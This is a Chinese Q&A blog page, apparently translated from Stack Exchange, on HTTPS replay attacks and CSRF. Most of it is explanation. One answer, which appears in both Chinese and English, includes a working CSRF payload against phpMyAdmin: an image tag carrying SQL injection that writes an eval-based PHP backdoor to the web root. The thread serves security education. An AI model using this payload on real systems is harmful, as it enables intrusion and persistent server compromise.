当前位置：文江博客话题详情

HTTPS 请求的重放攻击

发布于 2024-08-31 11:34:44 字数 293 浏览 4 评论 0原文

假设安全测试人员使用代理（例如 Fiddler），并使用管理员的凭据记录 HTTPS 请求 - 在重放整个请求（包括会话和身份验证 cookie）时，安全测试人员能够成功（重新）记录事务。据称这是 CSRF 漏洞的迹象。

恶意用户需要做什么才能拦截 HTTPS 请求并重放它？这是脚本小子、资金充足的军事黑客团队或时间旅行外星技术的任务吗？记录用户的 SSL 会话并在票证过期之前重播它们真的那么容易吗？

目前应用程序中没有代码对 HTTP GET 执行任何有趣的操作，因此据我所知，欺骗管理员单击链接或使用恶意 URL 加载图像不是问题。

原文

分享到QQ

分享到微博

如果你对这篇内容有疑问，欢迎到本站社区发帖提问参与讨论，获取更多帮助，或者扫码二维码加入 Web 技术交流群。

发布评论

需要登录才能够评论，你可以免费注册一个本站的账号。

反话 2024-09-07 11:34:44

HTTPS 不可重播，握手序列中的第一个服务器响应包括服务器选择的随机数。

Fiddler 的作用是充当代理，这意味着它拦截浏览器的请求，然后向服务器生成相同的请求，这意味着它可以访问明文，这就是它将重播的内容。您的浏览器通过告诉您证书来自 Fiddler -“DO_NOT_TRUST_FiddlerRoot”来让您知道这一点，您必须同意这一点，然后它才会发送忽略证书不匹配的消息。

回复收藏 0 原文

十年九夏 2024-09-07 11:34:44

你所描述的不是CSRF漏洞。 HTTPS专门防御原始密文的重放攻击，防止攻击者获知请求的内容。

需要注意的是，HTTPS 不防御 CSRF。如果攻击者知道 GET/POST 变量应该是什么，那么他就能够构建恶意 html，当目标执行该 html 时，将执行攻击者想要的操作。如果 Web 应用程序不是公开的，并且攻击者不知道 HTTP 请求的样子，那么他们就无法伪造该请求。例如，这是我针对 phpMyAdmin 编写的 CSRF 漏洞。我已经修改了这个漏洞以使用 https，我所要做的就是将 url 从 http:// 更改为 https:// 。

<html>
<img src="https://10.1.1.10/phpmyadmin/tbl_structure.php?db=information_schema&table=TABLES%60+where+0+union+select+char%2860%2C+63%2C+112%2C+104%2C+112%2C+32%2C+101%2C+118%2C+97%2C+108%2C+40%2C+36%2C+95%2C+71%2C+69%2C+84%2C+91%2C+101%2C+93%2C+41%2C+63%2C+62%29+into+outfile+%22%2Fvar%2Fwww%2Fbackdoor.php%22+--+1">
</html>

此漏洞利用 mysql 的“into outfile”来删除后门。它可以与无脚本一起使用，因为它正在伪造 GET 请求，并且浏览器认为它是图像，直到为时已晚。

What you are describing is not a CSRF vulnerability. HTTPS specifically defends against re-play attacks of raw cipher text and prevents the attacker from knowing the contents of the request.

It is important to note that HTTPS does not defend against CSRF. If the attacker knows what the GET/POST variables should be then he is able to build malicious html that when it is executed by a target will perform the action the attacker desires. If the web application isn't public and he the attacker doesn't know an HTTP request looks like, then they can't forge the request. For instance here is a CSRF exploit i wrote against phpMyAdmin. I have modified this exploit to work with https, and all i had to do was change the url from http:// to https:// .

<html>
<img src="https://10.1.1.10/phpmyadmin/tbl_structure.php?db=information_schema&table=TABLES%60+where+0+union+select+char%2860%2C+63%2C+112%2C+104%2C+112%2C+32%2C+101%2C+118%2C+97%2C+108%2C+40%2C+36%2C+95%2C+71%2C+69%2C+84%2C+91%2C+101%2C+93%2C+41%2C+63%2C+62%29+into+outfile+%22%2Fvar%2Fwww%2Fbackdoor.php%22+--+1">
</html>

This exploit uses mysql's "into outfile" to drop a backdoor. It work with no-script, becuase it is forging a GET request, and the browser thinks its an image until its too late.

回复收藏 0 原文

看透却不说透 2024-09-07 11:34:44

您的意思是仅仅暗示 SSL 的重播（尚未公开表明其可能）或身份验证 cookie（特定于应用程序）？前者表明 SSL 中存在一个迟钝的、秘密发现的漏洞（我可能会补充说，您不太可能能够修复该漏洞）。后者，即任意机器可以为先前建立的经过身份验证的会话提供 cookie，确实表明您的应用程序中存在潜在可利用的 CSRF 漏洞，应该解决该漏洞。

尽管 SSL 流量通常被认为不可能通过 MTM 攻击来嗅探（假设您已针对去年 11 月披露的漏洞采取了纠正措施），但存储在用户远程计算机上的 cookie 也无法免受拦截（特别是如果您的网站或与您的网站位于同一域的任何网站中存在 XSS 漏洞）。这种跨域/两个漏洞的利用越来越普遍，从严格的安全角度来看，即使不是直接通过您的应用程序，漏洞也可能被利用。

回复收藏 0 原文